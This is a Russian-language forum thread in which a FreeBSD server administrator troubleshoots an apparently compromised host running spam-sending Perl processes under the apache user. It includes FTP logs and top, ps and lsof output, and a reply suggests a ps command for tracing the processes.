forum.opennet.ru - "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" (5)

форумы

помощь

поиск

регистрация

майллист

вход/выход

слежка

"Несколько процессов mail (perl 5.8.8) от пользователя apache гр"

Форум Открытые системы на сервере (Система. проблемы, диагностика / FreeBSD)
Вариант для распечатки		Пред. тема \| След. тема
Изначальное сообщение		[ Отслеживать ]

"Несколько процессов mail (perl 5.8.8) от пользователя apache гр"	+/–
Сообщение от kkoshakk (ok) on 22-Июл-11, 01:46
Весь моцк сломал уже :( Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит ЦП на 100%. ПО на сервере: Directadmin, Apache, Php, Mysql, Exim, Dovecot, Proftpd Процесс mail (perl 5.8.8) запускатся с частотой 10-15 минут. Убиение процессов ни к чему не приводит. Пробовал следующее: В директории /var/log/httpd логи апача всех клиентов. [root@da /var/log/httpd]# grep -r "\.pl" * [root@da /var/log/httpd]# grep -r "\.cgi" * Только эрроры Полный лог proftpd за несколько часов [root@da /var/log/proftpd]# cat paranoid.log ::ffff:178.95.25.6 UNKNOWN ftp [21/Jul/2011:23:04:26 +0300] "USER yuzhnyorg" 331 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:27 +0300] "PASS (hidden)" - - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:27 +0300] "SYST" 215 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:27 +0300] "FEAT" 211 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:27 +0300] "PWD" 257 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:27 +0300] "TYPE A" 200 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:28 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:28 +0300] "LIST" 226 915 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:33 +0300] "CWD public_html" 250 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:33 +0300] "PWD" 257 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:33 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:34 +0300] "LIST" 226 2082 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:50 +0300] "SIZE page.php" 550 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:50 +0300] "TYPE I" 200 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:50 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:04:51 +0300] "RETR page.php" 226 3284 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:05:22 +0300] "SIZE head.php" 213 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:05:22 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:05:22 +0300] "RETR head.php" 226 2969 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:41 +0300] "PWD" 257 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:44 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:45 +0300] "STOR head.php" 226 4731 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:45 +0300] "SIZE head.php" 213 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:45 +0300] "TYPE A" 200 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:45 +0300] "PASV" 227 - ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:06:45 +0300] "LIST" 226 2082 ::ffff:178.95.25.6 UNKNOWN yuzhnyorg [21/Jul/2011:23:12:21 +0300] "QUIT" 221 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:11 +0300] "USER anonymous" 331 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:11 +0300] "PASS (hidden)" 530 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:12 +0300] "QUIT" 221 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:12 +0300] "USER anonymous" 331 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:13 +0300] "PASS (hidden)" 530 - ::ffff:66.249.72.3 UNKNOWN ftp [22/Jul/2011:00:35:13 +0300] "QUIT" 221 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:35:53 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:38:59 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:00 +0300] "PASS (hidden)" 530 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:00 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:00 +0300] "PASS (hidden)" 530 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:30 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:30 +0300] "PASS (hidden)" 530 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:30 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:39:30 +0300] "PASS (hidden)" 530 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:40:30 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:40:30 +0300] "PASS (hidden)" 530 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:40:30 +0300] "USER anonymous" 331 - ::ffff:93.81.219.118 UNKNOWN ftp [22/Jul/2011:00:40:31 +0300] "PASS (hidden)" 530 - Информация о системе: [root@da /home]# uname -a FreeBSD da.geonic.net 6.2-RELEASE FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2007 root@dessler.cse.buffalo.edu:/usr/obj/usr/src/sys/SMP i386 [root@da /home]# top last pid: 12857; load averages: 3.47, 2.66, 3.25 up 1+02:39:54 00:31:23 114 processes: 7 running, 106 sleeping, 1 zombie CPU states: 63.5% user, 0.0% nice, 31.8% system, 2.1% interrupt, 2.6% idle Mem: 178M Active, 508M Inact, 244M Wired, 40M Cache, 109M Buf, 1620K Free Swap: 4096M Total, 60M Used, 4036M Free, 1% Inuse PID USERNAME THR PRI NICE SIZE RES STATE C TIME WCPU COMMAND 12685 root 1 127 0 12824K 10520K RUN 1 0:26 44.10% dataskq 12207 apache 1 102 0 11228K 5428K select 1 1:04 11.43% perl5.8.8 11680 apache 1 104 0 10544K 5572K RUN 1 2:06 11.28% perl5.8.8 12326 apache 1 103 0 9996K 5316K select 1 0:49 11.18% perl5.8.8 12327 apache 1 103 0 10472K 5300K select 0 0:52 10.74% perl5.8.8 11544 apache 1 100 0 10516K 5496K RUN 0 2:16 8.59% perl5.8.8 11583 apache 1 102 0 11188K 5696K RUN 0 2:34 8.54% perl5.8.8 12206 apache 1 99 0 11140K 5348K select 0 0:55 7.76% perl5.8.8 11689 apache 1 99 0 11048K 5496K RUN 0 2:14 7.62% perl5.8.8 11545 apache 1 98 0 11352K 5512K select 0 2:30 6.25% perl5.8.8 11679 apache 1 98 0 10936K 5584K select 1 2:21 5.96% perl5.8.8 11690 apache 1 99 0 10664K 5596K select 1 2:03 5.86% perl5.8.8 11582 apache 1 98 0 10844K 5512K select 1 2:12 5.57% perl5.8.8 12493 apache 1 101 0 7912K 4692K select 1 0:18 5.52% perl5.8.8 11440 apache 1 100 0 8892K 4944K CPU1 1 1:29 5.32% perl5.8.8 11454 apache 1 98 0 9148K 4932K select 0 1:31 4.69% perl5.8.8 12814 apache 1 96 0 7508K 4640K select 1 0:02 1.99% perl5.8.8 12752 apache 1 20 0 30556K 19964K lockf 0 0:01 1.40% httpd 12749 apache 1 20 0 32832K 22236K lockf 0 0:01 0.85% httpd 971 bind 1 96 0 23192K 19836K select 0 5:46 0.00% named 633 root 1 96 0 6196K 488K select 1 2:01 0.00% snmpd 94022 mysql 5 20 0 43468K 25704K kserel 0 0:30 0.00% mysqld 759 apache 5 20 0 200M 1100K kserel 0 0:24 0.00% mysqld 854 root 1 8 0 916K 272K nanslp 0 0:03 0.00% da-popb4smt 1571 apache 1 20 0 1692K 392K pause 1 0:03 0.00% cache_clean 703 root 1 96 0 3084K 1372K select 0 0:01 0.00% openvpn 9157 koshak 1 96 0 6252K 2656K select 0 0:01 0.00% sshd 99496 mail 1 96 0 3052K 2332K select 0 0:01 0.00% exim 11534 root 1 8 0 29952K 18996K nanslp 0 0:01 0.00% httpd 6138 koshak 1 96 0 6252K 2476K select 0 0:01 0.00% sshd 748 root 1 8 0 1436K 316K nanslp 0 0:01 0.00% cron 12806 apache 1 20 0 30584K 19628K lockf 0 0:01 0.00% httpd 9159 root 1 8 0 12784K 11380K wait 0 0:01 0.00% bash 91002 root 1 4 0 1536K 1024K kqread 0 0:01 0.00% dovecot 91003 root 1 4 0 2228K 1524K kqread 0 0:01 0.00% dovecot-aut 12750 apache 1 20 0 30512K 19784K lockf 0 0:00 0.00% httpd 734 root 1 96 0 3536K 348K select 0 0:00 0.00% sshd 6929 root 1 5 0 3288K 1768K ttyin 1 0:00 0.00% bash 12805 apache 1 4 0 30540K 19752K kqread 0 0:00 0.00% httpd 799 root 1 8 0 4300K 168K wait 0 0:00 0.00% directadmin 12764 apache 1 20 0 30548K 19804K lockf 0 0:00 0.00% httpd 12751 apache 1 96 0 36968K 26208K select 0 0:00 0.00% httpd 12804 apache 1 96 0 33172K 22400K select 0 0:00 0.00% httpd 677 root 1 96 0 1288K 116K select 1 0:00 0.00% usbd 12773 apache 1 20 0 31056K 20260K lockf 0 0:00 0.00% httpd 12498 mail 1 4 0 3196K 2492K sbwait 1 0:00 0.00% exim 12753 apache 1 20 0 32840K 22100K lockf 0 0:00 0.00% httpd 3309 root 1 96 0 1376K 896K select 0 0:00 0.00% syslogd 3469 root 1 96 0 3400K 2540K select 1 0:00 0.00% proftpd 12838 root 1 96 0 2588K 1668K CPU0 0 0:00 0.00% top 6126 root 1 4 0 6276K 2476K sbwait 0 0:00 0.00% sshd 9143 root 1 4 0 6276K 2652K sbwait 0 0:00 0.00% sshd 6139 koshak 1 8 0 3220K 1588K wait 0 0:00 0.00% bash 94001 root 1 8 0 1728K 928K wait 0 0:00 0.00% sh 9158 koshak 1 8 0 3220K 1804K wait 1 0:00 0.00% bash [root@da /home]# ps -ax \| grep perl 11440 ?? Rs 1:32.13 mail (perl5.8.8) 11454 ?? Ss 1:34.00 mail (perl5.8.8) 11544 ?? Rs 2:21.31 mail (perl5.8.8) 11545 ?? Rs 2:35.56 mail (perl5.8.8) 11582 ?? Rs 2:17.47 mail (perl5.8.8) 11583 ?? Rs 2:39.45 mail (perl5.8.8) 11679 ?? Ss 2:26.66 mail (perl5.8.8) 11680 ?? Ss 2:10.03 mail (perl5.8.8) 11689 ?? Rs 2:18.40 mail (perl5.8.8) 11690 ?? Ss 2:07.97 mail (perl5.8.8) 12206 ?? Rs 0:59.91 mail (perl5.8.8) 12207 ?? Rs 1:08.43 mail (perl5.8.8) 12326 ?? Rs 0:52.70 mail (perl5.8.8) 12327 ?? Rs 0:55.82 mail (perl5.8.8) 12493 ?? Rs 0:20.31 mail (perl5.8.8) 12814 ?? Rs 0:05.79 mail (perl5.8.8) 12864 ?? Rs 0:02.65 mail (perl5.8.8) 12865 ?? Ss 0:02.70 mail (perl5.8.8) 12940 p1 RL+ 0:00.00 grep perl [root@da /home]# lsof -p 11583 COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME perl5.8.8 11583 apache cwd VDIR 0,90 512 2 / perl5.8.8 11583 apache rtd VDIR 0,90 512 2 / perl5.8.8 11583 apache txt VREG 0,90 9424 11262916 /usr/local/bin/perl perl5.8.8 11583 apache txt VREG 0,90 158712 13942785 /libexec/ld-elf.so.1 perl5.8.8 11583 apache txt VREG 0,90 1143145 11611342 /usr/local/lib/perl5/5.8.8/mach/CORE/libperl.so perl5.8.8 11583 apache txt VREG 0,90 98120 26189828 /lib/libm.so.4 perl5.8.8 11583 apache txt VREG 0,90 28680 26189826 /lib/libcrypt.so.3 perl5.8.8 11583 apache txt VREG 0,90 43572 26189832 /lib/libutil.so.5 perl5.8.8 11583 apache txt VREG 0,90 922668 26189837 /lib/libc.so.6 perl5.8.8 11583 apache txt VREG 0,90 16534 11591352 /usr/local/lib/perl5/5.8.8/mach/auto/IO/IO.so perl5.8.8 11583 apache txt VREG 0,90 23392 11611159 /usr/local/lib/perl5/5.8.8/mach/auto/Socket/Socket.so perl5.8.8 11583 apache txt VREG 0,90 103741 11591527 /usr/local/lib/perl5/5.8.8/mach/auto/POSIX/POSIX.so perl5.8.8 11583 apache 0r VCHR 0,26 0t0 26 /dev/null perl5.8.8 11583 apache 1w VCHR 0,26 0t0 26 /dev/null perl5.8.8 11583 apache 2w VCHR 0,26 0t0 26 /dev/null perl5.8.8 11583 apache 3u IPv4 0xc6a09000 0t0 TCP geonic.net:59071->mail.kemptonchiropractic.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 4u PIPE 0xc4ed5be0 0 ->0xc4ed5b28 perl5.8.8 11583 apache 5u IPv4 0xc77fe168 0t0 UDP :53615 perl5.8.8 11583 apache 6u IPv4 0xc50ef740 0t0 TCP geonic.net:58411->ns35.xenserve.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 7u IPv4 0xc76c5cb0 0t0 TCP geonic.net:59256->mx1c38.carrierzone.com:smtp (SYN_SENT) perl5.8.8 11583 apache 8u IPv4 0xc621b570 0t0 TCP geonic.net:58928->cmx0.sol.net:smtp (SYN_SENT) perl5.8.8 11583 apache 9u IPv4 0xc8388740 0t0 TCP geonic.net:58660->mail.vcity.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 10u IPv4 0xc80eae10 0t0 UDP :59257 perl5.8.8 11583 apache 11u IPv4 0xc77863a0 0t0 TCP geonic.net:59192->mx0a-00075501.pphosted.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 12u IPv4 0xc654eae0 0t0 TCP geonic.net:59103->168.61.70.65:smtp (ESTABLISHED) perl5.8.8 11583 apache 13u IPv4 0xc77cf924 0t0 UDP :57613 perl5.8.8 11583 apache 14u IPv4 0xc8023570 0t0 TCP geonic.net:58385->hood.cnchost.com:smtp (SYN_SENT) perl5.8.8 11583 apache 15u IPv4 0xc7fc8b40 0t0 UDP :63470 perl5.8.8 11583 apache 16u IPv4 0xc77293a0 0t0 TCP geonic.net:59169->74-94-197-163-Pennsylvania.hfc.comcastbusiness.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 17u IPv4 0xc5c3f5a0 0t0 UDP :57839 perl5.8.8 11583 apache 18u IPv4 0xc83c0570 0t0 TCP geonic.net:57230->mail1.sadad.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 19u IPv4 0xc5a4c000 0t0 TCP geonic.net:58377->tripmail.trip.com.br:smtp (ESTABLISHED) perl5.8.8 11583 apache 20u IPv4 0xc5012000 0t0 TCP geonic.net:59074->westpointcity.org:smtp (ESTABLISHED) perl5.8.8 11583 apache 21u IPv4 0xc9dd3910 0t0 TCP geonic.net:59188->server86.appriver.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 22u IPv4 0xc74b27bc 0t0 UDP :57251 perl5.8.8 11583 apache 23u IPv4 0xc98e8000 0t0 TCP geonic.net:58829->ns2.nittsu.co.jp:smtp (ESTABLISHED) perl5.8.8 11583 apache 24u IPv4 0xc66a8ae0 0t0 TCP geonic.net:57921->obmail.paccar.com:smtp (SYN_SENT) perl5.8.8 11583 apache 25u IPv4 0xc606d1d0 0t0 TCP localhost:59058->localhost:smtp (ESTABLISHED) perl5.8.8 11583 apache 26u IPv4 0xc8320910 0t0 TCP geonic.net:59159->smtpproxy3.earth1.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 27u IPv4 0xc9d94cb0 0t0 TCP geonic.net:58952->mx3.xs4all.nl:smtp (ESTABLISHED) perl5.8.8 11583 apache 28u IPv4 0xc59f71d0 0t0 TCP geonic.net:58917->mail.enterprise.k12.ca.us:smtp (ESTABLISHED) perl5.8.8 11583 apache 29u IPv4 0xc7eb4000 0t0 UDP :50424 perl5.8.8 11583 apache 30u IPv4 0xc5045cb0 0t0 TCP geonic.net:58902->mail.dl.cn:smtp (ESTABLISHED) perl5.8.8 11583 apache 31u IPv4 0xc6ddb3a0 0t0 TCP geonic.net:59028->dfw0100b.zsi.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 32u IPv4 0xc5cf0d5c 0t0 UDP :60706 perl5.8.8 11583 apache 33u IPv4 0xc63da3a0 0t0 TCP geonic.net:57180->mail2.pharsight.com:smtp (SYN_SENT) perl5.8.8 11583 apache 34u IPv4 0xc621aae0 0t0 TCP geonic.net:57487->www.ihz.it:smtp (ESTABLISHED) perl5.8.8 11583 apache 35u IPv4 0xc92491d0 0t0 TCP geonic.net:58397->mx.jazztel.es:smtp (ESTABLISHED) perl5.8.8 11583 apache 36u IPv4 0xc82d2910 0t0 TCP geonic.net:59221->ns4.ecore.com.au:smtp (SYN_SENT) perl5.8.8 11583 apache 37u IPv4 0xc644f000 0t0 TCP geonic.net:58960->eastmailhub.treas.gov:smtp (ESTABLISHED) perl5.8.8 11583 apache 38u IPv4 0xc6885000 0t0 TCP geonic.net:59089->super.bagco-ng.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 40u IPv4 0xc66a7910 0t0 TCP geonic.net:58425->mx.jazztel.es:smtp (ESTABLISHED) perl5.8.8 11583 apache 41u IPv4 0xc9d9e3a0 0t0 TCP geonic.net:58977->mailgw.hamur.hanjin.com:smtp (SYN_SENT) perl5.8.8 11583 apache 42u IPv4 0xc6a2e3a0 0t0 TCP geonic.net:59065->ww-in-f27.1e100.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 43u IPv4 0xc6e60cb0 0t0 TCP geonic.net:58672->mtalibero21.libero.it:smtp (ESTABLISHED) perl5.8.8 11583 apache 44u IPv4 0xc9e5e3a0 0t0 TCP geonic.net:59020->commcenter.bresnan.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 45u IPv4 0xc9eab910 0t0 TCP geonic.net:59235->mtalibero08.libero.it:smtp (ESTABLISHED) perl5.8.8 11583 apache 46u IPv4 0xc6b54000 0t0 TCP geonic.net:59024->correu.lleida.net:smtp (SYN_SENT) perl5.8.8 11583 apache 47u IPv4 0xc63a60b4 0t0 UDP :56295 perl5.8.8 11583 apache 48u IPv4 0xc78c7000 0t0 TCP geonic.net:59151->dd8100.kasserver.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 49u IPv4 0xc6dd91d0 0t0 TCP geonic.net:59183->mx.east.cox.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 50u IPv4 0xc98f0910 0t0 TCP geonic.net:59036->smtp-in-1.userservices.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 51u IPv4 0xc5895740 0t0 TCP geonic.net:59008->Static-IP-cr19014612612.cable.net.co:smtp (SYN_SENT) perl5.8.8 11583 apache 52u IPv4 0xc77fd7bc 0t0 UDP :62986 perl5.8.8 11583 apache 53u IPv4 0xc83cc570 0t0 TCP geonic.net:59155->207-234-130-219.ptr.primarydns.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 54u IPv4 0xc8074570 0t0 TCP geonic.net:59225->mailgw-4.kofax.com:smtp (SYN_SENT) perl5.8.8 11583 apache 55u IPv4 0xc63c0cb0 0t0 TCP geonic.net:58310->71-9-150-74.static.oxfr.ma.charter.com:smtp (SYN_SENT) perl5.8.8 11583 apache 56u IPv4 0xc83c6570 0t0 TCP geonic.net:59100->wy-in-f27.1e100.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 57u IPv4 0xca05e000 0t0 TCP geonic.net:58153->search-core1.bo3.lycos.com:smtp (ESTABLISHED) perl5.8.8 11583 apache 58u IPv4 0xc83a33a0 0t0 TCP geonic.net:58520->mx1.earthlink.net:smtp (SYN_SENT) perl5.8.8 11583 apache 59u IPv4 0xc9f70cb0 0t0 TCP geonic.net:57799->65.214.185.134:smtp (ESTABLISHED) perl5.8.8 11583 apache 60u IPv4 0xc9092cb0 0t0 TCP geonic.net:57999->knott.8086.net:smtp (SYN_SENT) perl5.8.8 11583 apache 61u IPv4 0xc82f31d0 0t0 TCP geonic.net:58523->external.hdis.com:smtp (SYN_SENT) perl5.8.8 11583 apache 62u IPv4 0xc5d3b740 0t0 TCP geonic.net:59110->mail2.cancer.org:smtp (ESTABLISHED) perl5.8.8 11583 apache 63u IPv4 0xc5a36ae0 0t0 TCP geonic.net:58546->mx1.earthlink.net:smtp (SYN_SENT) perl5.8.8 11583 apache 64u IPv4 0xc82a8cb0 0t0 TCP geonic.net:58550->smtp.getontheweb.com:smtp (SYN_SENT) perl5.8.8 11583 apache 65u IPv4 0xc8284910 0t0 TCP geonic.net:59238->server94.appriver.com:smtp (SYN_SENT) perl5.8.8 11583 apache 66u IPv4 0xca0633a0 0t0 TCP geonic.net:59173->hood.cnc.net:smtp (SYN_SENT) perl5.8.8 11583 apache 67u IPv4 0xc7e13740 0t0 TCP geonic.net:58332->200.39.223.100:smtp (SYN_SENT) perl5.8.8 11583 apache 68u IPv4 0xc6dd73a0 0t0 TCP geonic.net:59138->dy-in-f27.1e100.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 69u IPv4 0xc66a91d0 0t0 TCP geonic.net:58336->200.39.223.100:smtp (SYN_SENT) perl5.8.8 11583 apache 72u IPv4 0xc8286000 0t0 TCP geonic.net:59179->mx.east.cox.net:smtp (ESTABLISHED) perl5.8.8 11583 apache 490u VREG 0,90 0 24777126 / (/dev/ar0s1a) netstat приводить нет смысла, там много обращений на 25 порт на разные айпишники.
Ответить \| Правка \| Cообщить модератору

Оглавление

Несколько процессов mail (perl 5.8.8) от пользователя apache гр, universite, 02:20 , 22-Июл-11, (1)

Несколько процессов mail (perl 5.8.8) от пользователя apache гр, kkoshakk, 02:56 , 22-Июл-11, (2)

Несколько процессов mail (perl 5.8.8) от пользователя apache гр, universite, 03:18 , 22-Июл-11, (3)

Несколько процессов mail (perl 5.8.8) от пользователя apache гр, kkoshakk, 04:00 , 22-Июл-11, (4)

Несколько процессов mail (perl 5.8.8) от пользователя apache гр, kkoshakk, 04:13 , 22-Июл-11, (5)

Сообщения по теме [Сортировка по времени | RSS]

1. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" +/–

Сообщение от universite (ok) on 22-Июл-11, 02:20

> Весь моцк сломал уже :(
> Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит
> ЦП на 100%.
ps -auxwww | grep perl

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

2. "Несколько процессов mail (perl 5.8.8) от пользователя apache гр" +/–

Сообщение от kkoshakk (ok) on 22-Июл-11, 02:56

>> Весь моцк сломал уже :(
>> Подскажите, пожалуйста, как найти этот злорадный скрипт, который рассылает спам и грузит
>> ЦП на 100%.
> ps -auxwww | grep perl
[root@da /home/koshak]# ps -auxwww | grep perl
apache  16011  2.2  0.5  8928  5508  ??  Rs    1:00AM   1:51.32 mail (perl5.8.8)
apache  14197  2.1  0.5  8940  4944  ??  Rs   12:44AM   2:50.67 mail (perl5.8.8)
apache  13355  2.1  0.6  9656  5812  ??  Rs   12:36AM   3:21.99 mail (perl5.8.8)
apache  11680  2.0  0.6 10544  6272  ??  Rs   12:13AM   5:56.69 mail (perl5.8.8)
apache  14290  2.0  0.6  9096  5900  ??  Rs   12:44AM   2:44.04 mail (perl5.8.8)
apache  15074  2.0  0.6  8844  5644  ??  Ss   12:51AM   2:19.88 mail (perl5.8.8)
apache  16792  2.0  0.6  8504  5588  ??  Rs    1:07AM   1:30.74 mail (perl5.8.8)
apache  12206  2.0  0.6 11140  6192  ??  Rs   12:22AM   4:42.89 mail (perl5.8.8)
apache  12207  2.0  0.6 11228  6140  ??  Rs   12:22AM   4:52.73 mail (perl5.8.8)
apache  14291  2.0  0.6  9612  5748  ??  Rs   12:44AM   2:43.89 mail (perl5.8.8)
apache  16746  2.0  0.6  8592  5584  ??  Rs    1:07AM   1:31.91 mail (perl5.8.8)
apache  18002  2.0  0.5  8828  5428  ??  Rs    1:17AM   1:08.76 mail (perl5.8.8)
apache  18325  2.0  0.5  8420  5352  ??  Rs    1:22AM   0:57.50 mail (perl5.8.8)
apache  12864  1.9  0.6 10164  5964  ??  Rs   12:31AM   3:46.74 mail (perl5.8.8)
apache  13190  1.9  0.6  9876  5776  ??  Rs   12:34AM   3:28.56 mail (perl5.8.8)
apache  13356  1.9  0.6  9708  5844  ??  Rs   12:36AM   3:23.38 mail (perl5.8.8)
apache  15070  1.9  0.6  9564  5736  ??  Ss   12:51AM   2:21.53 mail (perl5.8.8)
apache  16010  1.9  0.6  9168  5608  ??  Rs    1:00AM   1:51.23 mail (perl5.8.8)
apache  16593  1.9  0.6  8704  5632  ??  Rs    1:04AM   1:36.37 mail (perl5.8.8)
apache  16745  1.9  0.5  8684  5432  ??  Rs    1:07AM   1:30.35 mail (perl5.8.8)
apache  17063  1.9  0.5  8460  5460  ??  Rs    1:10AM   1:22.22 mail (perl5.8.8)
apache  18010  1.9  0.5  8240  5400  ??  Rs    1:17AM   1:06.39 mail (perl5.8.8)
apache  19263  1.9  0.5  8364  5112  ??  Rs    1:41AM   0:23.32 mail (perl5.8.8)
apache  19330  1.9  0.5  7616  5100  ??  Rs    1:43AM   0:19.14 mail (perl5.8.8)
apache  13017  1.9  0.6  9724  5816  ??  Rs   12:33AM   3:37.08 mail (perl5.8.8)
apache  14790  1.9  0.6  9504  5848  ??  Ss   12:48AM   2:30.79 mail (perl5.8.8)
apache  16594  1.9  0.5  8944  5536  ??  Ss    1:04AM   1:38.07 mail (perl5.8.8)
apache  18778  1.9  0.5  8740  5176  ??  Ss    1:31AM   0:40.71 mail (perl5.8.8)
apache  19207  1.9  0.5  8192  5060  ??  Rs    1:39AM   0:26.09 mail (perl5.8.8)
apache  19267  1.9  0.5  8448  5060  ??  Rs    1:41AM   0:22.44 mail (perl5.8.8)
apache  19331  1.9  0.5  8084  5028  ??  Rs    1:43AM   0:19.36 mail (perl5.8.8)
apache  14791  1.8  0.6  8904  5744  ??  Rs   12:48AM   2:30.00 mail (perl5.8.8)
apache  15071  1.8  0.6  9364  5660  ??  Rs   12:51AM   2:20.71 mail (perl5.8.8)
apache  18009  1.8  0.5  8764  5488  ??  Rs    1:17AM   1:06.96 mail (perl5.8.8)
apache  19266  1.8  0.5  7932  5120  ??  Rs    1:41AM   0:22.25 mail (perl5.8.8)
apache  11440  1.8  0.5  8892  5056  ??  Rs   12:09AM   5:10.70 mail (perl5.8.8)
apache  12327  1.8  0.6 10472  6052  ??  Ss   12:23AM   4:43.95 mail (perl5.8.8)
apache  13018  1.8  0.6  9436  5980  ??  Ss   12:33AM   3:35.03 mail (perl5.8.8)
apache  19132  1.8  0.5  7292  4744  ??  Rs    1:37AM   0:31.02 mail (perl5.8.8)
apache  11545  1.7  0.6 11352  6124  ??  Rs   12:11AM   6:18.98 mail (perl5.8.8)
apache  11679  1.7  0.6 10936  6312  ??  Rs   12:13AM   6:12.97 mail (perl5.8.8)
apache  12814  1.7  0.5  9500  5004  ??  Rs   12:30AM   3:42.96 mail (perl5.8.8)
apache  18076  1.7  0.5  8000  4820  ??  Rs    1:19AM   1:05.63 mail (perl5.8.8)
apache  12326  1.7  0.6 10256  6068  ??  Rs   12:23AM   4:37.75 mail (perl5.8.8)
apache  15075  1.7  0.6  9092  5700  ??  Rs   12:51AM   2:19.73 mail (perl5.8.8)
apache  16979  1.7  0.5  8924  5560  ??  Rs    1:09AM   1:23.72 mail (perl5.8.8)
apache  19262  1.6  0.5  8344  5160  ??  Rs    1:41AM   0:23.85 mail (perl5.8.8)
apache  19439  1.6  0.5  8780  5120  ??  Rs    1:45AM   0:17.75 mail (perl5.8.8)
apache  11582  1.6  0.6 10844  6172  ??  Rs   12:11AM   6:02.30 mail (perl5.8.8)
apache  11689  1.6  0.6 11048  6140  ??  Rs   12:13AM   6:02.26 mail (perl5.8.8)
apache  19861  1.5  0.5  7524  4696  ??  Ss    1:55AM   0:03.14 mail (perl5.8.8)
apache  18349  1.5  0.5  8632  5316  ??  Rs    1:22AM   0:56.86 mail (perl5.8.8)
apache  19786  1.5  0.5  7728  4896  ??  Rs    1:53AM   0:04.96 mail (perl5.8.8)
apache  16793  1.5  0.6  8544  5580  ??  Rs    1:07AM   1:29.57 mail (perl5.8.8)
apache  19206  1.5  0.5  8364  5124  ??  Rs    1:39AM   0:25.59 mail (perl5.8.8)
apache  18326  1.4  0.5  8596  5424  ??  Rs    1:22AM   0:58.53 mail (perl5.8.8)
apache  19205  1.4  0.5  7988  4864  ??  Rs    1:39AM   0:26.84 mail (perl5.8.8)
apache  19438  1.4  0.5  8044  5064  ??  Ss    1:45AM   0:17.64 mail (perl5.8.8)
